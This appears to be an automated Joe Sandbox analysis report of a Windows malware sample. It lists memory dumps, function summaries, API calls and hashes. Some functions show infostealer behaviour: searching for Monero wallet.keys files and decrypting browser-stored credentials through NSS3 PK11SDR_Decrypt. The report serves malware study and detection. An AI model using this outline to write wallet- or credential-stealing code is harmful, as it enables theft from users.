Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*.*
API String ID: 180737720-1013718255
Opcode ID: 93bb9c244c9797b041135d0db7214c8ae828c578f3cfa65597ab66335b09c318
Instruction ID: ce076ec5be333f327db7e3f70cff1053745bfccb0fc3789d3a7ec503fc994c9d
Opcode Fuzzy Hash: 93bb9c244c9797b041135d0db7214c8ae828c578f3cfa65597ab66335b09c318
Instruction Fuzzy Hash: A6E1F8719112189AEB55FB60DC92EEE733CAF64301F8041E9B54A624D2EF706F8ACF51

Function 004BC7B7 Relevance: 15.3, Strings: 11, Instructions: 1589COMMON

Download Yara Rule

Strings

^mW, xrefs: 004BD8C5
?P?, xrefs: 004BD64D
Zm_~, xrefs: 004BCCAC
b}], xrefs: 004BD2C4
bQ}, xrefs: 004BCAE4
Z>~, xrefs: 004BD4D9
nqk, xrefs: 004BC7D3
tW==, xrefs: 004BC8A0
;Rn6, xrefs: 004BD97E
G=$, xrefs: 004BCA28
be@_K@1@XZ, xrefs: 004BD2B7

Memory Dump Source

Source File: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ;Rn6$?P?$G=$$Zm_~$bQ}$be@_K@1@XZ$b}]$nqk$tW==$Z>~$^mW
API String ID: 0-4052670065
Opcode ID: c5a31d66f0927b113fef13e8a06861226e3db80928d7d23d6df1a6a9e96d793d
Instruction ID: bdd164049b355302766ae46011168b2c81f91c97915ec11c87f9b622528552ee
Opcode Fuzzy Hash: c5a31d66f0927b113fef13e8a06861226e3db80928d7d23d6df1a6a9e96d793d
Instruction Fuzzy Hash: 40B2F6F3A0C2049FD304AE29EC8567AFBE5EF94720F1A493DEAC4C7744EA3558058697

Function 000FDE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

Part of subcall function 0010A9B0: lstrlen.KERNEL32(?,00CD90F0,?,\Monero\wallet.keys,00110E17), ref: 0010A9C5
Part of subcall function 0010A9B0: lstrcpy.KERNEL32(00000000), ref: 0010AA04
Part of subcall function 0010A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0010AA12

Part of subcall function 0010A8A0: lstrcpy.KERNEL32(?,00110E17), ref: 0010A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00110C2E), ref: 000FDE5E
StrCmpCA.SHLWAPI(?,001114C8), ref: 000FDEAE
StrCmpCA.SHLWAPI(?,001114CC), ref: 000FDEC4
FindNextFileA.KERNEL32(000000FF,?), ref: 000FE3E0
FindClose.KERNEL32(000000FF), ref: 000FE3F2

Strings

\*.*, xrefs: 000FDE26

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: \*.*
API String ID: 2325840235-1173974218
Opcode ID: 95582656b9431d653521461343ecafc59667c73b9dbb71627c1458c38ff88cb0
Instruction ID: 52474e7bf1125c2fe7d3f16efa02752f4d0c23d5ab4ae9ddebdd54104a51effe
Opcode Fuzzy Hash: 95582656b9431d653521461343ecafc59667c73b9dbb71627c1458c38ff88cb0
Instruction Fuzzy Hash: 79F1AD719542189ADB59FB60CC95EEE7378AF34301FC041EAB54A620D1EF706B8ACF52

Function 000FC820 Relevance: 13.6, APIs: 9, Instructions: 95stringencryptionCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 000FC871
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 000FC87C
PK11_GetInternalKeySlot.NSS3 ref: 000FC88A
PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 000FC8A5
PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 000FC8EB
lstrcat.KERNEL32(?,00110B46), ref: 000FC943
lstrcat.KERNEL32(?,00110B47), ref: 000FC957
PK11_FreeSlot.NSS3(?), ref: 000FC961
lstrcat.KERNEL32(?,00110B4E), ref: 000FC978

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: K11_lstrcat$Slot$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlen
String ID:
API String ID: 3356303513-0
Opcode ID: e4561745bca4062f40589986352f778a8be3783359ab03bbcd4875d073ad278e
Instruction ID: a2251cee4eab0a48829fdf7051ff4ed191b86956609be582ef32f5dcc3ca6235
Opcode Fuzzy Hash: e4561745bca4062f40589986352f778a8be3783359ab03bbcd4875d073ad278e
Instruction Fuzzy Hash: 54415075D0821DDBDB10DF94DD89BFEB7B8BB48304F1041A8F509A6280D7B45A84DF91

Function 004C3307 Relevance: 10.3, Strings: 7, Instructions: 1594COMMON

Download Yara Rule

Strings

$*;_, xrefs: 004C3947
_=4,, xrefs: 004C3942
RR=, xrefs: 004C4352
ugU, xrefs: 004C3A9D
$*;_, xrefs: 004C3954
|Fwv, xrefs: 004C3D39
Ta:, xrefs: 004C465D

Memory Dump Source

Source File: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: $*;_$$*;_$RR=$Ta:$_=4,$|Fwv$ugU
API String ID: 0-469959157
Opcode ID: eb39c32fd5d81cfaeb62d7fe717fc39ab68eb61311435b8ee96cd5dedba596dc
Instruction ID: 3185abb0d109ac12d822fd31cac7f3bf4fdf15360be5eda602576da1fe42d6a1
Opcode Fuzzy Hash: eb39c32fd5d81cfaeb62d7fe717fc39ab68eb61311435b8ee96cd5dedba596dc
Instruction Fuzzy Hash: 33B218F3A0C2109FE3086E29EC8567ABBE5EF94720F16493DE6C5C7744EA3558018797

Function 004BFC81 Relevance: 9.1, Strings: 6, Instructions: 1564COMMON

Download Yara Rule

Strings

YK], xrefs: 004C059C
Vw~., xrefs: 004C0F26
L<u, xrefs: 004C0481
del 143 Stepping 8, GenuineIntel, xrefs: 004C021B, 004C0220
T?, xrefs: 004C033F
b>Z, xrefs: 004BFD6F

Memory Dump Source

Source File: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: L<u$T?$Vw~.$YK]$del 143 Stepping 8, GenuineIntel$b>Z
API String ID: 0-1687366728
Opcode ID: 35f4965ace4914e5131a8f5fbb7f4c306da5509891c52822642f8b0c4841bcd3
Instruction ID: 970360c168a574b541356a84fd40162b0348743e1023443266fae6874e13fa59
Opcode Fuzzy Hash: 35f4965ace4914e5131a8f5fbb7f4c306da5509891c52822642f8b0c4841bcd3
Instruction Fuzzy Hash: 8DB217F3A082109FE304AE2DEC8567AFBE5EF94720F1A453DEAC5D3344E67598018697

Function 004B4096 Relevance: 7.9, Strings: 5, Instructions: 1699COMMON

Download Yara Rule

Strings

j}, xrefs: 004B4185
I+U, xrefs: 004B470F
o{?, xrefs: 004B4F54
|6/, xrefs: 004B4C3B
OZ?, xrefs: 004B4AA6

Memory Dump Source

Source File: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: j}$o{?$I+U$OZ?$|6/
API String ID: 0-96620610
Opcode ID: df6ff7bf914063505562304cfc2b9068e60145ac5d11eacfc17d9cb53178b1d9
Instruction ID: 8491d156b39e60109bf2c4463e7941cc64bef0b1ea35fce9b217e578e0bf2773
Opcode Fuzzy Hash: df6ff7bf914063505562304cfc2b9068e60145ac5d11eacfc17d9cb53178b1d9
Instruction Fuzzy Hash: 03B207F3A0C2049FE304AE2DEC8567ABBE9EFD4720F1A453DE6C4D3744E93598058696

Function 004B2696 Relevance: 7.9, Strings: 5, Instructions: 1656COMMON

Download Yara Rule

Strings

ids}, xrefs: 004B35A3
EU~Z, xrefs: 004B2F91
4A3h, xrefs: 004B27EB
fnn, xrefs: 004B2F6C
ids}, xrefs: 004B35BA

Memory Dump Source

Source File: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
